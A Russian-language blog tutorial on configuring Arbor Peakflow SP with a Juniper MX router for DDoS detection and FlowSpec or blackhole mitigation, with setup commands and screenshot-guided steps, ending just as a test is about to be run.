Защита од DDoS атак, методом FlowSpec. Настройка связки Arbor Peakflow SP CP (Collector Platform) и маршрутизатора Juniper MX 480, без использования TMS.<br />
Хотел бы немного поделится информацией по поводу тестов и проведенных исследований и общения с крутыми спецами из Arbor Networks, в рамках данной связки.<br />
<br />
Немного олдовой картинки :)<br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRwjG3mVd9rKFMDI2JjNp9hfz6zPCGDwYvDXh1aZmtgXNC5VtAjr9zyjysafwSt2oQBKgx47ddy-52ILckzpPz5XjSOj0pk1o75xAKyQsA1qSFHgUn07pDqZ1kIB5iev82e7p_BY7ertk/s1600/f289764f-45c4-49ac-be20-7a685601b543.png"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRwjG3mVd9rKFMDI2JjNp9hfz6zPCGDwYvDXh1aZmtgXNC5VtAjr9zyjysafwSt2oQBKgx47ddy-52ILckzpPz5XjSOj0pk1o75xAKyQsA1qSFHgUn07pDqZ1kIB5iev82e7p_BY7ertk/s640/f289764f-45c4-49ac-be20-7a685601b543.png" width="640" /></a></div>
<br />
Немного подумав, можно преподнести эту связку следующим образом:<br />
<div>
<div>
<br />
Если заглянуть последний WISR (Worldwide Infrastructure Security Report), то можно обнаружить интересную статистику.<br />
<br />
А именно:<br />
<div>
<div>
<div>
<ul style="text-align: left;">
<li>65% всех атак - атаки на переполнение емкости каналов связи. Это различные Amplification - DNS, NTP, SNMP, и т.п.</li>
<li>остальные 35% приблизительно поровну State-exhaustion (TCP Flood_ы) и Application-layer (HTTP flood_ы, LOIC, HOIC, Slowloris, и т.п.) атаки</li>
<li>при этом 56% опрошенных нами клиентов видят многовекторные атаки, т.е. практически одномоментный в профиле трафика могут присутствовать все три или любые из двух типов атак. Эта статистика из года в год приблизительно одинакова.</li>
</ul>
Дело в том, что:</div>
<div>
<a name='more'></a><br /></div>
<div>
<div>
<ul style="text-align: left;">
<li>с атаками типа Amplification бесполезно бороться блокировкой IP-адресов источников, впрочем, как и с большой частью State-exhaustion. Причина - SRC адреса, как правило, поддельные (spoofed). Т.е. блокирую по src адресам, мы будем блокировать “не тех, кого надо”</li>
<li><b><u>с Amplification можно эффективно бороться как раз с помощью связки Peakflow + MX. В этом случае CP детектирует атаки, а MX их блокирует.</u> Другими словами такая связка позволяет блокировать <u>до 65% DDoS атак.</u></b></li>
<li>со State-Exhaustion в случае поддельных адресов Flow Spec в большинстве случаев не поможет, впрочем как и блокировка по SRC адресам. Для того, чтобы подавить такую атаку нам и нужен TMS, который выступает в роли устройства, проверяющего факт того, что конкретный TCP SYN (например) действительно был отправлен хостом с SRC адресом в заголовке пакета.</li>
<li>Блокировка по SRC-адресам в случае State-Exhaustion будет происходить только тогда, когда IP-адреса реальные, но объем определенного трафика от них превышает допустимые значения.</li>
<li>Для детектирования атак L7 нам нужен либо TMS, либо клиентский APS. CP обнаружить такие атаки не может. Адреса-источники будут блокироваться в большинстве случаев.</li>
</ul>
Если подытожить вышесказанное то:</div>
</div>
<div>
<ul style="text-align: left;">
<li>65% атак - многовекторные. Весь трафик раскладывается на компоненты вплоть до ранжирования источников трафика, распределения по размерам пакетов, наиболее загруженных маршрутизаторов и интерфейсов, и т.п. Т.е. вся атака - как на ладони.</li>
<li>CP реализует простую идею - невозможно бороться с тем, чего не видишь и не понимаешь. Поняв атаку, мы можем понять как с ней эффективнее всего бороться.</li>
</ul>
<div>
<b>В случае связки с FlowSpec мы будем, в первую очередь, оперировать другими </b><br />
характеристиками атаки нежели SRC адреса.<br />
<br />
К примеру:<br />
<b>- размер пакета;<br />- dst ip + port<br />- fragmentation</b><br />
<br />
<u>Это делается руками. <b>Flow Spec преобразуется в ACL на граничных маршрутизаторах и может быть опасен для маршрутизирующего оборудования, если он неправильно применен. Вот наиболее яркий пример</b></u>:<a href="https://blog.cloudflare.com/todays-outage-post-mortem-82515/">https://blog.cloudflare.com/todays-outage-post-mortem-82515/</a>.<br />
<br />
<i>В случае с автоматическим подавлением атаки с помощью TMS в худшем случае пострадает трафик перенаправленный на TMS, но никак не вся сеть.</i><br />
<br />
из практики:<br />
<b><u>"Кстати очень мало кто из операторов реализует на своих сетях auto mitigation."</u></b><br />
<b><br />Если подытожить, то мы имеем систему(если мы ограничиваемся только коллектором флоу), которая показывает видеть где что происходит, что бы более оперативно предпринимать действия по смягчению атаки. Нельзя позиционировать эту связку, как систему автоматической защиты, да и вообще защиты от DDoS атак, но позволяет увидеть ее тонкости и понять, как с ней бороться (цитируя выше сказанное)</b></div>
</div>
<br />
<br />
Архитектура RFC5575<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMRPgoRMK-AmQrHzNbvHD2F_yyTqOhy8lXKc1WN8efhLYK2hf_YjyFwxqw17RPpQ4h4HpA50p9UqY7zDU5v0IpvXloaKlNtmqODaxFCRLOvGKWqVbj_si8lkEmA8ZihucI1LCmOlltDZg/s1600/1.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMRPgoRMK-AmQrHzNbvHD2F_yyTqOhy8lXKc1WN8efhLYK2hf_YjyFwxqw17RPpQ4h4HpA50p9UqY7zDU5v0IpvXloaKlNtmqODaxFCRLOvGKWqVbj_si8lkEmA8ZihucI1LCmOlltDZg/s640/1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJKeeOjCivEHGxFUPIliz32EP2j8_dPGHbWXNDfRquysb8e647nw44-vpCs-R0JJiewD7qt4P7Sp-ubyWdlBqAvLb78LHQp-qbBYG-EmN2wKb52wPEYzBw4tSrSGuM3tMjdnYA7oRp7Q/s1600/2.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJKeeOjCivEHGxFUPIliz32EP2j8_dPGHbWXNDfRquysb8e647nw44-vpCs-R0JJiewD7qt4P7Sp-ubyWdlBqAvLb78LHQp-qbBYG-EmN2wKb52wPEYzBw4tSrSGuM3tMjdnYA7oRp7Q/s640/2.png" /></a><br />
<br />
Перейдем к настройке Arbor Peakflow SP (CP) Collector Platform.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyJe-dsyqajpLgxmBklg_dmC9BOIlfXJYge643SSspv_yfxd-z2_XOeIDKCglv6maqKbmaG_UySfdj8oV0SnZjU4NPRgqj243v41lWDfQycY1xf-0jkwr4WyxXAzK7yXxe2iY8u_Rf1-8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyJe-dsyqajpLgxmBklg_dmC9BOIlfXJYge643SSspv_yfxd-z2_XOeIDKCglv6maqKbmaG_UySfdj8oV0SnZjU4NPRgqj243v41lWDfQycY1xf-0jkwr4WyxXAzK7yXxe2iY8u_Rf1-8/s640/3.png" width="640" /></a></div>
<br />
<br />
Первоначальная настройка простая:<br />
Коннектимся по консоли:<br />
• Baud rate: 9600<br />
• Data bits: 8<br />
• Stop bits: 1<br />
• Parity: None<br />
• Flow control: None</div>
<br />
<br />
admin:arbor<br />
меняем дефолтный пасс<br />
#/ services aaa local password admin interactive <br />
#/ system name set hostname<br />
#/ clock set date_and_time<br />
#/ ip interfaces ifconfig interface_name IP_address netmask up<br />
<br />
Проверка ифейса:</div>
<div>
#/ ip interfaces show</div>
<div>
#/ ip route add default IP_address</div>
<div>
#/ services ntp server add primary IP_address local</div>
<div>
#/ services dns server add IP_address local</div>
<div>
<br /></div>
<div>
Обязательно пишем access листы на коробку:</div>
<div>
#/ ip access add service {name | all} CIDR</div>
<div>
#/ ip access show</div>
<div>
#/ ip access commit</div>
<div>
<br /></div>
<div>
#/ services ssh key generate</div>
<div>
#/ services ssh key host set default</div>
<div>
#/ services ssh start</div>
<div>
<br /></div>
<div>
Последнее, обязательное, секрет-зона:</div>
<div>
<div>
/ services sp bootstrap {leader | nonleader} leader_IP zone_secret</div>
</div>
<div>
<br /></div>
<div>
Стартуем сервис SP</div>
<div>
<br /></div>
<div>
#/ services sp start</div>
<div>
<br /></div>
<div>
Записываем конфиг в память:</div>
<div>
config write</div>
<div>
<br /></div>
<div>
И теперь мы можем попасть на коробку, по web, для дальнейшей настройки связки.</div>
<div>
<br /></div>
<div>
Проверяем лицухи, и сразу ставим ползунки, для принятия флоу на соответствующих интерфейсах:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kaYxzt3GnDUG2W7TbWhAuDhL0pOfw_yTP6TsbPWuFjz_GC8Z3pdREBsZ6qkQZ5b2DdjS1VpZKp_ggacL2IhpCeBcq2_8demEE1bPuK6XoxE4kbG_gF1-H5I0fIGF704pZQYOZZVBOpg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kaYxzt3GnDUG2W7TbWhAuDhL0pOfw_yTP6TsbPWuFjz_GC8Z3pdREBsZ6qkQZ5b2DdjS1VpZKp_ggacL2IhpCeBcq2_8demEE1bPuK6XoxE4kbG_gF1-H5I0fIGF704pZQYOZZVBOpg/s640/1.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Далее в настройках Configure Network прописываем ASку(по которой связь) и название :</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtyWuw5o5QCthQOfdMIdyEWvH2WxVT3Cc6dMhOLWb6iOIKDX1cJ_LIVSPu_b6tUgFY_dLGrp2tFrgg8IMUn2d9idvAK4up5egedC5E07y09Dby22gcVNJa2ajNVwl4zO664Oqi7a-CHXI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtyWuw5o5QCthQOfdMIdyEWvH2WxVT3Cc6dMhOLWb6iOIKDX1cJ_LIVSPu_b6tUgFY_dLGrp2tFrgg8IMUn2d9idvAK4up5egedC5E07y09Dby22gcVNJa2ajNVwl4zO664Oqi7a-CHXI/s640/2.png" width="640" /></a></div>
<div>
</div>
<div>
Далее добавляем роутер, к которым будет строится BGP сессия, где 10.66.6.2 - адрес ифейса на сторороне роутера, 10.66.6.1 - Peakflow CP соответственно :</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS-mN4YMKB0pqno6XUOrgHMq42k0pS0pzIESvZKmw51rALRvL2AW0RYuW0RcY7jU0ZgDhzTZngvH5SKeCT1CpPQY0e7WW9UyMejlHsqAJShFbGlq-UnhdicOtgZaCNn5IpqC85t4Cw2V4/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS-mN4YMKB0pqno6XUOrgHMq42k0pS0pzIESvZKmw51rALRvL2AW0RYuW0RcY7jU0ZgDhzTZngvH5SKeCT1CpPQY0e7WW9UyMejlHsqAJShFbGlq-UnhdicOtgZaCNn5IpqC85t4Cw2V4/s640/3.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Далее как добавляется роутер (заполение нужных полей):</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIwt9ru2S35iaKhCnmRlBBO-EREmrZAeqV_hEaB_hXEW2Ocs9_AuG9AbFZBG7tLwBJudi8fz0n3hZVjgjWrthxrukjG1J8s2i2JZhTXQufyQN9YyZn6VEhSKkBUzE7YDRYge3mL7yGUQc/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIwt9ru2S35iaKhCnmRlBBO-EREmrZAeqV_hEaB_hXEW2Ocs9_AuG9AbFZBG7tLwBJudi8fz0n3hZVjgjWrthxrukjG1J8s2i2JZhTXQufyQN9YyZn6VEhSKkBUzE7YDRYge3mL7yGUQc/s640/4.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIT4nBYgbbbYc0n0ZV-53DyIHwlMmVgmNFlmWbAW_VlLhQkevE2g3bZ_dK_gwmgiNceO0_RTsr1ZtfeOda15u5EMoKDsVU1_a8QrpcPJpwwdxfHasd5nurtS_30-VAiO_jevw84eq_qr4/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIT4nBYgbbbYc0n0ZV-53DyIHwlMmVgmNFlmWbAW_VlLhQkevE2g3bZ_dK_gwmgiNceO0_RTsr1ZtfeOda15u5EMoKDsVU1_a8QrpcPJpwwdxfHasd5nurtS_30-VAiO_jevw84eq_qr4/s640/5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<b><span style="font-size: large;">Тут обязательно ставим галочку !</span></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg18mQ_pTEvP52NhlyOFG0I1lk9a8SbKT_zntFwD3lC1Xk5VwMLsZ7cpP2guPucz4q15CYAYWLYTodcdE1l9doodWE61p2ALPUe63F1sYblFquI0gUeFFiry9TgnCl3EfhVKe8KKVL2kgQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg18mQ_pTEvP52NhlyOFG0I1lk9a8SbKT_zntFwD3lC1Xk5VwMLsZ7cpP2guPucz4q15CYAYWLYTodcdE1l9doodWE61p2ALPUe63F1sYblFquI0gUeFFiry9TgnCl3EfhVKe8KKVL2kgQ/s640/6.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4V4TC2iW5swg_hpA6wK3sgCZhOYCFdMrsDW9iTsQ3jO-_emJLplCaUZWll6jE7TtYT7s4MOz9Z4ZwT8o1cRHAwJsSRVfl36a0tKiqk-AUR1C6kqoFwPYEqNP2ujKeijvreI8n4Zo7YQ4/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4V4TC2iW5swg_hpA6wK3sgCZhOYCFdMrsDW9iTsQ3jO-_emJLplCaUZWll6jE7TtYT7s4MOz9Z4ZwT8o1cRHAwJsSRVfl36a0tKiqk-AUR1C6kqoFwPYEqNP2ujKeijvreI8n4Zo7YQ4/s640/7.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4Izs8Zp1rXoLtnxbVWkTVd4UvrXQuD_oAtrUg-g2Ft2NhnweAJrAdC7zRC40kdRP2NTLcDs79FeSFq-D_Qm1lVKGr8ekwb0XnCmWbftjVa20MkbZKOWM5lOBvze87VT0p2vdubs4IgY4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4Izs8Zp1rXoLtnxbVWkTVd4UvrXQuD_oAtrUg-g2Ft2NhnweAJrAdC7zRC40kdRP2NTLcDs79FeSFq-D_Qm1lVKGr8ekwb0XnCmWbftjVa20MkbZKOWM5lOBvze87VT0p2vdubs4IgY4/s640/8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Далее создаем "защищаемую группу хостов или хоста"</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HgEmvudWKUf8ZDXi6d0DI1x8U27twJD3Z-aaAMIarABM5tk1gr6KiavAK8TErVSYdd1-No5_dcFIGwYKih1UKE2Z5bbcHia0y4PA7GwO_xXzOInQd3fxGdFUwLHOlDOspkFvgddHmFc/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HgEmvudWKUf8ZDXi6d0DI1x8U27twJD3Z-aaAMIarABM5tk1gr6KiavAK8TErVSYdd1-No5_dcFIGwYKih1UKE2Z5bbcHia0y4PA7GwO_xXzOInQd3fxGdFUwLHOlDOspkFvgddHmFc/s640/9.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Название и описание:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC3t9mmDsBga_1DtMXhArka2uo5G8spAV9XPXp45Bo5e-L9nyD2fRxIti_NqOsIuZzVC-CZTDeLBwmzyLA1ON13jqsEQJ3JduJSf_4aakG5r7qxOxlTd1dqOehewL9uxSh3sudKjQkYLg/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC3t9mmDsBga_1DtMXhArka2uo5G8spAV9XPXp45Bo5e-L9nyD2fRxIti_NqOsIuZzVC-CZTDeLBwmzyLA1ON13jqsEQJ3JduJSf_4aakG5r7qxOxlTd1dqOehewL9uxSh3sudKjQkYLg/s640/10.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Адрес или сетка:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiECeMaOzW9s6SOk90PvdVOy5r3F_jGNL4wTbpcVcS8IYjGRndXypezxJ1AydReM-awNgkGFHEgUfGY_6HBPjUgONCUmZmwkuD3vHvM2-Bxc2vl_gXUytdLZ5hVvoh2aSjoeumQedrGd9U/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiECeMaOzW9s6SOk90PvdVOy5r3F_jGNL4wTbpcVcS8IYjGRndXypezxJ1AydReM-awNgkGFHEgUfGY_6HBPjUgONCUmZmwkuD3vHvM2-Bxc2vl_gXUytdLZ5hVvoh2aSjoeumQedrGd9U/s640/11.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFS_z94L6zS_9h5HAtk4Nn132VNurQx-M9SHGcRie7rno-inCG3AEIbISBMvrJWOz70Hd9_eTnpyaO23K9grMxqmaS2Ouhbe6SOKaLs5vrzCDR1YH_M_gLBrHhjAuIDlAJlRsjsDh5CGc/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFS_z94L6zS_9h5HAtk4Nn132VNurQx-M9SHGcRie7rno-inCG3AEIbISBMvrJWOz70Hd9_eTnpyaO23K9grMxqmaS2Ouhbe6SOKaLs5vrzCDR1YH_M_gLBrHhjAuIDlAJlRsjsDh5CGc/s640/12.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Я для теста, установил маленькие пороги, для того что бы проверить срабатывание алерта на возможную атаку (которую генерировать буду сам) :</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO4OG1uRiAvtIhWqS2pyCcMBnar1oxcw0mgyX_rVJZRDLDO8dTLXUEGAzXlgh8GF5qFYOjdIDzzkOImjjpIU1aLWqFG8laldCRDuATTlu0dRlMDmLnvGRKUUxF4O7tDZ2jCgXW2qOUel4/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO4OG1uRiAvtIhWqS2pyCcMBnar1oxcw0mgyX_rVJZRDLDO8dTLXUEGAzXlgh8GF5qFYOjdIDzzkOImjjpIU1aLWqFG8laldCRDuATTlu0dRlMDmLnvGRKUUxF4O7tDZ2jCgXW2qOUel4/s640/13.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0hbKI7YpufEuZ_LrTm4cVRzg-dBO4gDfjqxAtluW5Fl72J-Gz3UILe_wa4I-ie3it2LzkzGkCtNbY1yue3lAXz64y8nJ7zAXbeb8JjRC98meTCp1xwuOyFdGmOLf-uynMrYlMmWMkjh4/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0hbKI7YpufEuZ_LrTm4cVRzg-dBO4gDfjqxAtluW5Fl72J-Gz3UILe_wa4I-ie3it2LzkzGkCtNbY1yue3lAXz64y8nJ7zAXbeb8JjRC98meTCp1xwuOyFdGmOLf-uynMrYlMmWMkjh4/s640/14.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Включаем, а так же, как видно, можно очень гранулярно и дотошно настроить срабатывание на превышение тех или иных указанных параметров:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Ow-QJzxPTgIoNnXEzo0-NInYMayp3BDbyM9j4cCP0h1O9i3hlzeCU3J8ACu6v0puAnMr8qGeiR9wRCKhPhYSQZUGYW3PLGAxvatsQ3N6tvR2yzWHzoXiBgUqz7dn0oPasVaoYz8iHHk/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Ow-QJzxPTgIoNnXEzo0-NInYMayp3BDbyM9j4cCP0h1O9i3hlzeCU3J8ACu6v0puAnMr8qGeiR9wRCKhPhYSQZUGYW3PLGAxvatsQ3N6tvR2yzWHzoXiBgUqz7dn0oPasVaoYz8iHHk/s640/15.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Авто-митигация в нашем случае не сработает, так как у нас нет TMS, поэтому ставим none. А в полях что ниже указывам варианты с default.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5-ipc0uVVSmDNHLl7QI1NJrGUI_l9ovnNmy2Lg7QypzH9Ist2fQ1bnUB7EzpdGBecAGLYuQo4gjeDObJyQhrcDlOB1KW0Y9aeccEjlQe68WN1sWDjJqYJM6VSdRDYHwmeW5JhZKfiuw/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5-ipc0uVVSmDNHLl7QI1NJrGUI_l9ovnNmy2Lg7QypzH9Ist2fQ1bnUB7EzpdGBecAGLYuQo4gjeDObJyQhrcDlOB1KW0Y9aeccEjlQe68WN1sWDjJqYJM6VSdRDYHwmeW5JhZKfiuw/s640/16.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Тут только пропишем для блекхола:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4RwEqplQUnioD0xzuMyoxKrLqS9UudD8bet6CJjCo0h6KuIOaZr7mN9taaZAouGBHq35YxszvCzmDjsv9uNWkNu-G655JWdLIan7J6FN1fxiiOFnFzrT0CqtaHTfnKiWFF4IyaK7xBpg/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4RwEqplQUnioD0xzuMyoxKrLqS9UudD8bet6CJjCo0h6KuIOaZr7mN9taaZAouGBHq35YxszvCzmDjsv9uNWkNu-G655JWdLIan7J6FN1fxiiOFnFzrT0CqtaHTfnKiWFF4IyaK7xBpg/s640/17.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
И еще раз проверим галочку, так как без нее не будет работать связка:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA-tQH_ICInoF0KEV0sirP48vcDEdGzv4QdibLEJbC49HwIjs-HZOzkpYcjCPy1VH1j9S4Yh69vTUu-jt2nh982GbkoKcpPyMs6snbpjGFjjtyReSQlye_jg4dN2c-g5KA8sgYhGP9rZU/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA-tQH_ICInoF0KEV0sirP48vcDEdGzv4QdibLEJbC49HwIjs-HZOzkpYcjCPy1VH1j9S4Yh69vTUu-jt2nh982GbkoKcpPyMs6snbpjGFjjtyReSQlye_jg4dN2c-g5KA8sgYhGP9rZU/s640/18.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<span style="font-size: large;">Далее, нужно настроить вторую сторону, а именно Juniper MX.</span></div>
<div>
Настройка взята с блога моего соседа по блогу, который делал эту связку со мной (со стороны MX) там много интересных штук, рекомендую :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOpNw8B-B1CvpDI-W9cncsX0QQCRE44K1DSIt02hZ6lnjSb-MMekIOfmrSlIurS2hgnfnYWKxD_EXZt7PQkkatWFLOfzBOF4r_02fpTy9tuDla5oIdk-USfscpgQzMUR7GU-15dEgQypQ/s1600/Clip2net_160314115210.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOpNw8B-B1CvpDI-W9cncsX0QQCRE44K1DSIt02hZ6lnjSb-MMekIOfmrSlIurS2hgnfnYWKxD_EXZt7PQkkatWFLOfzBOF4r_02fpTy9tuDla5oIdk-USfscpgQzMUR7GU-15dEgQypQ/s640/Clip2net_160314115210.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<br /></div>
</div>
<div>
<div style="text-align: center;">
<a href="http://show-route.blogspot.com/2016/03/juniper-mx-arbor-ddos-mitigation.html"><span style="font-size: large;">http://show-route.blogspot.com/2016/03/juniper-mx-arbor-ddos-mitigation.html</span></a></div>
</div>
<div>
<br /></div>
<div>
После данных настроек, на стороне Arbor SP мы должны увидеть что флоу льется, и сессия BGP между ними поднята, а так же работает SNMP! :</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjowxI3OcQhcuHl8Jx67OHplcfQRDs5dH6JmCXH5tw8SMrDY-sCPqv8KJgN_hIxH9KGP3Gg00_1DpowFWjIFl9WOtznrl7L6C-jnletY0DqIS1PIZ01GR_-Q9LU4HiYl4mUZNajFe4m-UM/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjowxI3OcQhcuHl8Jx67OHplcfQRDs5dH6JmCXH5tw8SMrDY-sCPqv8KJgN_hIxH9KGP3Gg00_1DpowFWjIFl9WOtznrl7L6C-jnletY0DqIS1PIZ01GR_-Q9LU4HiYl4mUZNajFe4m-UM/s640/20.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
А так же, замеры, сколько флоу летит на коллектор(семплинг что на Arbor что на Juniper MX 1/1000):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCxtEMsGM4s-p3zypyiW_5jfIt6FeyOFy5cUzYkPuyA-QOLpl2rx_7bMaAZ7AS91i7dOw8wxONSjWRiIZv002j_zzXLDYymlLe_pSay3V-oTYQ-3rkAVapYuthjVsfu5cxQ7gznC3hmMU/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCxtEMsGM4s-p3zypyiW_5jfIt6FeyOFy5cUzYkPuyA-QOLpl2rx_7bMaAZ7AS91i7dOw8wxONSjWRiIZv002j_zzXLDYymlLe_pSay3V-oTYQ-3rkAVapYuthjVsfu5cxQ7gznC3hmMU/s640/21.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Вроде с основным разобрались, далее тест связки на определение атаки, а так же подавление ее с помощью FlowSpec или BGP blackhole.</div>
<div>
<br /></div>
<div>
Запустим тест:</div>
<div class="separator" style="clear: both; text-align: center;">
